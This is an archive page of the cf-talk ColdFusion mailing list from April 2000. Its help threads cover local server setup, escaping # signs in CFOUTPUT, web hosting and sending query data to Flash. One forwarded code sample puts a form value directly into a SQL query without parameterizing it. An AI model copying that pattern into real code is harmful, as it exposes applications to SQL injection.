 Ken

 --
 Archives: http://www.eGroups.com/list/cf-talk
 To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in the body.


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Small Web-Content-Management System as freeware ?

2000-04-15 Thread cftalk

Hi, does somebody know of a very small Web-Content-Management System
(freeware !!) ?
The Dynamic Content Publishing System ("Tack2 Intranet") coming as an
CF-example bundled with CF is even too sophisticated.
Uwe




--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Re: https problems

2000-04-15 Thread Bud

On 4/15/00, Ian penned:
If I hard code in the full path (http://www.mydomain.com/search) I end up with
http://www.mydomain.com/www.mydomain.com/search/ when I load the page. I have
a single server mapping of / which maps to the server ip address..

Shouldn't you map it to the web root?


Bud Schneehagen - Tropical Web Creations

_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
ColdFusion Solutions / eCommerce Development
[EMAIL PROTECTED]
http://www.twcreations.com/
954.721.3452
--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Removing the underline of a text link??

2000-04-15 Thread Levi Wallach

Oh, snipping CAN hurt, let me tell you! ;-)


 -Original Message-
 From: Kevin R. Merker [mailto:[EMAIL PROTECTED]]
 Sent: Saturday, April 15, 2000 6:19 AM
 To: cf-talk
 Subject: Removing the underline of a text link??
 
 
 This is a multi-part message in MIME format.
 
 --=_NextPart_000_002C_01BFA6C4.1186A1E0
 Content-Type: text/plain;
   charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 
 I want to remove the underline of a text link.
 How do you do this. A little snippet of code couldn't hurt.
 
 Thanks,
 
 Kevin
 
 

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



No Subject

2000-04-15 Thread Aaron Rouse


test

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Re: Newbie Needs Help

2000-04-15 Thread Allen

 I'm guessing you already have CF running on the server.  So check to see if
the web server knows what to do with .cfm files.

==  -  ==   ==  -  ====  -  ==
Allen Graetz
USI - Web Application Programmer
1-800-USINTERNET x241
612-253-3241

- Original Message -
From: "LH Rothman" [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Saturday, April 15, 2000 6:28 PM
Subject: Newbie Needs Help


 I've spent hours trying to view .cfm files in my browser.  Use IE and
 type "http://127.0.0.1/a2z/hello1.cfm" and get error message "HTTP / 1.0
 404 Object Not Found".  Try to browse file within Studio and error
 message "This browser only supports local files" - to the best of my
 knowledge this is a local file.

 I'm running Windows NT and know I must be making a small, stupid
 mistake.  I am able to ping 127.0.0.1 and I can succesfully test the
 installation within the Admin.

 Help please!
 -Laura

 --

 Archives: http://www.eGroups.com/list/cf-talk
 To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Re: Newbie Needs Help

2000-04-15 Thread Kevin R. Merker

What Web server are you running? Did you set the path in studio?
Options / Settings / Development Mapping -Set your path to the root
directory of your web server i.e. C:\apache\htdocs\-put your test files
in the htdocs  folder. This should take care of the problem. You did install
your web server 1st, Coldfusion Server 2nd, ColdFusion Studio 3rd didn't
you? This is a must do.

If you need more help I'll be at home email me direct if you want to.

Kevin Merker

- Original Message -
From: LH Rothman [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Saturday, April 15, 2000 11:28 PM
Subject: Newbie Needs Help


 I've spent hours trying to view .cfm files in my browser.  Use IE and
 type "http://127.0.0.1/a2z/hello1.cfm" and get error message "HTTP / 1.0
 404 Object Not Found".  Try to browse file within Studio and error
 message "This browser only supports local files" - to the best of my
 knowledge this is a local file.

 I'm running Windows NT and know I must be making a small, stupid
 mistake.  I am able to ping 127.0.0.1 and I can succesfully test the
 installation within the Admin.

 Help please!
 -Laura

 --

 Archives: http://www.eGroups.com/list/cf-talk
 To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Re: Newbie Needs Help

2000-04-15 Thread Mike Kear


Laura, you've had a few good suggestions, but here's a little check list
you can use:

(1)  There *IS* such a file, yes?Use explorer to see if there's a file
called hello1.cfm in that folder.  There ought to be because it's installed
in a default installation, but it never hurts to check the obvious.
(2)  Enter http://127.0.0.1/a2z/ and see if you get a listing of the
folder.  Either you wont because your web server is set up to prevent
folder listings or you should see a list of the files in that folder,
including the hello1.cfm
(3) Check that you have a mapping to that folder.   Either put one in using
CF Administrator or if you're using Microsoft's Personal Web Server PWS,
double click on the icon in the sytem tray and click on advanced.   You can
set up a mapping to that folder there.   In my case, the mapping is like
this:  a2z/ maps to f:\CFTutorial\ which is where I moved the a2z
application to.
If you're using another web server, you'll have to work out yourself how to
make a new mapping.
(4) Try using http://localhost/ ...  instead of  http://127.0.0.1/...  If
this works, I'm not sure quite what it's telling you (which proves how much
a muddler I am)  but I'd suspect you haven't got something set up right in
your ip settings somewhere.  (But at least you'll be able to get on with
using CF while others help you fix that one.)

Above all, don't fret.  Once you get over this setting up 'hump', the rest
of it is straightforward.   

Cheers,
Mike Kear
AFP Web Development,
Windsor, NSW, Australia
http://www.afp.zip.com.



At 04:28 PM 15-04-00 -0700, you wrote:
I've spent hours trying to view .cfm files in my browser.  Use IE and
type "http://127.0.0.1/a2z/hello1.cfm" and get error message "HTTP / 1.0
404 Object Not Found".  Try to browse file within Studio and error
message "This browser only supports local files" - to the best of my
knowledge this is a local file.

I'm running Windows NT and know I must be making a small, stupid
mistake.  I am able to ping 127.0.0.1 and I can succesfully test the
installation within the Admin.

Help please!
-Laura

---
---
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


Mike Kear
[EMAIL PROTECTED]
www.afp.zip.com.au
Windsor, NSW, Australia

AFP Web Development
AFP Electronic Forms
AFP Models
--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



CF_AUTHNET problem

2000-04-15 Thread Skip Ogden

Well, for once, I searched the archives first but no answers.

I'm having trouble with CF_AUTHNET - it is declining everything. Does 
someone have a sample of the tag from a template I can see? I suspect the 
problem is in the syntax of the SEND parameter.

Thanks in advance...

Skip
--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



CF and flash

2000-04-15 Thread Jason Egan

has anyone had experience using flash in conjunction with CF?  Any opinions,
direction, recourses... anything would be much appreciated!

Jason Egan
Konnections

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Fw: Flash w/ CF

2000-04-15 Thread Sean Renet

Here is the thread that helped me
- Original Message -
From: "Mark Zukiwsky" [EMAIL PROTECTED]
To: "Sean Renet" [EMAIL PROTECTED]
Sent: Saturday, March 04, 2000 11:11 PM
Subject: Re: Flash w/ CF


 Mark I went to flasher and I do not see an archive for the list. could
you
 forward me your post.  I am trying to figure out how to use flash to
 retrieve variables from CF also.

 Hi Sean,

 Here's my post to the Flasher list from last week. They were asking
 the same thing you were.

 Just a note about the use of lists - this code was originally for use
 in Director Shockwave. I used lists so I could suppress white space
 and extraneous tab characters that were ending up in my variables,
 and for passing cf lists directly to Lingo Lists.

 Contact me if you have any questions.

 Mark Zukiwsky
 Edmonton, Canada

 --
-
 Date: Thu, 2 Mar 2000 14:24:00 -0700
 To: Flash List
 From: Mark Zukiwsky [EMAIL PROTECTED]
 Subject: Re: FLASH: Can anyone help me with flash and Cold Fusion?
 Cc: [EMAIL PROTECTED]
 Bcc:
 X-Attachments:

 Hi Sarah,

 Here's an example of a ColdFusion template that I'm using to get data
 into Flash. I'm using the POST function in Flash to fetch my
 variables. My Flash Post action is something like:

Set Variable: "baseURL" = "http://mark.foxmicro.net/flash/"
Set Variable: "CFtemplate" = "getMenuData.cfm"
Set Variable: "SiteID" = 1
Set Variable: "eof" = 0
Set Variable: "index" = 1
Load Variables (baseURL  CFtemplate, 0, vars=POST)
Go to and Play ("Check")

 That calls the following ColdFusion template:
 
 cfsetting showdebugoutput="no"
 cfsetting enablecfoutputonly="yes"
 cfcontent type="text/plain"

 !--- get training menu data, be sure to pass FORM.siteID ---
 cfquery name="flashtext" datasource="MyDatabase" dbtype="OLEDB"
 SELECT busUnit, unitName, novaUnit, activeUnit
 FROM UnitTBL
 WHERE SiteID = #Trim(FORM.SiteID)#
 ORDER BY novaUnit, unitName
 /cfquery

 !--- Convert query results into list ---
 cfset unitList = valueList(flashtext.busUnit)
 cfset nameList = valueList(flashtext.unitName)
 cfset novaList = valueList(flashtext.novaUnit)
 cfset activeList = valueList(flashtext.activeUnit)

 cfset unitReturn = ""
 cfset nameReturn = ""
 cfset novaReturn = ""
 cfset activeReturn = ""
 cfloop index = "unitIndex" from = "1" To = "#ListLen(unitList)#"
cfset tempUnit = ListGetAt(unitList, unitIndex)
cfset unitX = "unit"  unitIndex
cfset tempName = ListGetAt(nameList, unitIndex)
cfset unitNameX = "unitName"  unitIndex
cfset tempNova = ListGetAt(novaList, unitIndex)
cfset companyX = "company"  unitIndex
cfset tempActive = ListGetAt(activeList, unitIndex)
cfset activeX = "active"  unitIndex
cfoutput#unitX#=#tempUnit#/cfoutput
cfoutput#unitNameX#=#URLEncodedFormat(tempName)#/cfoutput
cfoutput#companyX#=#tempNova#/cfoutput
cfoutput#activeX#=#tempActive#/cfoutput
cfoutput#chr(13)#/cfoutput
 /cfloop
 cfoutputunitCount=#flashtext.recordCount##chr(13)#/cfoutput
 cfoutputeof=1/cfoutput
 

 The above template would return output like:
 

unit1=1unitName1=NOVA%20%2D%20Joffre%20Personnelcompany1=Trueactive1=Tru
e

unit2=11unitName2=Coutts%20Electrical%20Ltd%2Ecompany2=Falseactive2=True
 unit3=3unitName3=HATSCANcompany3=Falseactive3=True
 unit4=4unitName4=Modern%20Plant%20Servicescompany4=Falseactive4=True
 unit5=10unitName5=multimedia%20workscompany5=Falseactive5=False
 unit6=12unitName6=O%27Reilly%20Insulators%20Inc%2Ecompany6=Falseac
 tive6=True
 unit7=2unitName7=Quinn%20Contractingcompany7=Falseactive7=True
 unitCount=7
 eof=1

 Then in Flash I'd check whether the variables have been loaded by
 checking the value that the value of eof = 1:

If (eof = 1)
Go to and Play ("Done")
Else
Go to and Play ("Check")
End If

 After the variables have been loaded, I use this action to convert
 the results to variables:

Loop While (index = unitCount)
Set Variable: "tempUnitID"  index = Eval("unit"  index)
Set Variable: "tempUnit"  index = Eval("unitName"  index)
Set Variable: "tempCompany"  index = Eval("Company"  index)
Set Variable: "tempActive"  index = Eval("active"  index)
Set Variable: "index" = index + 1
End Loop
Go to and Play ("Display")

 Now, depending on what you're doing in your display, the results
 should display something like:

 http://mark.foxmicro.net/flashmenu/

 This example posts a random siteID to the ColdFusion template. To see
 the data that is used to build this menu try:

 http://mark.foxmicro.net/cf_flash/flashtest3.cfm?SiteID=1 or
SiteID=11937

 I hope this helps.

 Mark Zukiwsky
 Edmonton, Canada


--
Archives: 

RE: A Good CF Host Has What?

2000-04-15 Thread Steve Pierce

Speed, Quality, Price. Pick any two.

 - Steve


-Original Message-
From: Chris Giminez [mailto:[EMAIL PROTECTED]]
Sent: Saturday, April 15, 2000 1:47 PM
To: [EMAIL PROTECTED]
Subject: Re: A Good CF Host Has What?


I'm sure someone can add to this list, but here's a list of what a dream
host would offer in my
opinion:

Always up
unlimited pop accounts
reasonable price
web based email access
statistics package
real time account set up (or within an hour)
real time datasource set up
static IP (for development and testing without a domain)
phone (no more than 5 minutes on hold) or chat support



Chris Giminez
Owner - Cyber Scriber Web Site Design
831-728-4469
ICQ# 2628000





 Over time I've noticed the classic "I'm looking for a host threads".  One
of
 the things I've noticed is a general comment along the lines of "at least
 they're always up".

 I'm curious what people find to be important in a host.  But not only
that,
 but how difficult those things are to implement.  To me, I would think
that
 having enough bandwidth is a problem a host can easily fix with money
 (getting a OC-12 instead of a T-3, etc.).  But I would think something are
 more difficult to implement, like good customer service.

 -Allen

 --

 Archives: http://www.eGroups.com/list/cf-talk
 To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



# Signs From ColorCodes Affecting CFOUTPUTS

2000-04-15 Thread Marco Gil

In one of my web pages.. I have the following code:

CFOUTPUT QUERY="QuickDeals"
tr
td width="100%" align="center" bgcolor="#CC"
a href="#QuickDeals.QuickURL#"
target="_self"#QuickDeals.QuickDescription#/a
/td
/tr
/CFOUTPUT

How do I get CF to ignore the #CC... It causes an error there because it
thinks that it's a CF variable.

Also one quick question too... How do I get the above code to repeat itself
until all the entries in the table are outputted?  I know I can use CFLOOP
but for some reason it repeats ALL entries in the same table row which is
not what I want...

I hope someone can help :)  Thanks again.

Marco

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Re: # Signs From ColorCodes Affecting CFOUTPUTS

2000-04-15 Thread Emily B. Kim

How do I get CF to ignore the #CC... It causes an error there because it
thinks that it's a CF variable.

you have to escape the # sign with two # signs - ##CC

Also one quick question too... How do I get the above code to repeat itself
until all the entries in the table are outputted?  I know I can use CFLOOP
but for some reason it repeats ALL entries in the same table row which is
not what I want...

i'm not sure what you're asking here. because you used the query attribute
with the cfoutput tag, you should have produced one row for each record
returned from your query. what are you actually getting? -emily
--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: # Signs From ColorCodes Affecting CFOUTPUTS

2000-04-15 Thread Bill Killillay


 In one of my web pages.. I have the following code:

 CFOUTPUT QUERY="QuickDeals"
 tr
   td width="100%" align="center" bgcolor="#CC"a
href="#QuickDeals.QuickURL#"
target="_self"#QuickDeals.QuickDescription#/a/td
 /tr
 /CFOUTPUT
 How do I get CF to ignore the #CC... It causes an error there
 because it
 thinks that it's a CF variable.
bgcolor="#CC" change to bgcolor="##CC"


 Also one quick question too... How do I get the above code to
 repeat itself
 until all the entries in the table are outputted?  I know I can use CFLOOP
 but for some reason it repeats ALL entries in the same table row which is
 not what I want...

Your code above should create a new table row for each record just like it
is with out using a loop.  Would have to see more of the code to answer it
in any more detail.


 I hope someone can help :)  Thanks again.


Hope this helps a little bit.

Bill Killillay
ICQ @ 8425781

*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*
"An investment in Knowledge always pays the best interest."
   -Benjamin Franklin-
*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

Get Paid to Surf the Web.  It's free, easy and fun.
Sign up for AllAdvantage.com at

http://alladvantage.com/go.asp?refid=FIB-034

Most of us are on it every day all day anyway, why not give
yourself a pay raise for 25 hours a month.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.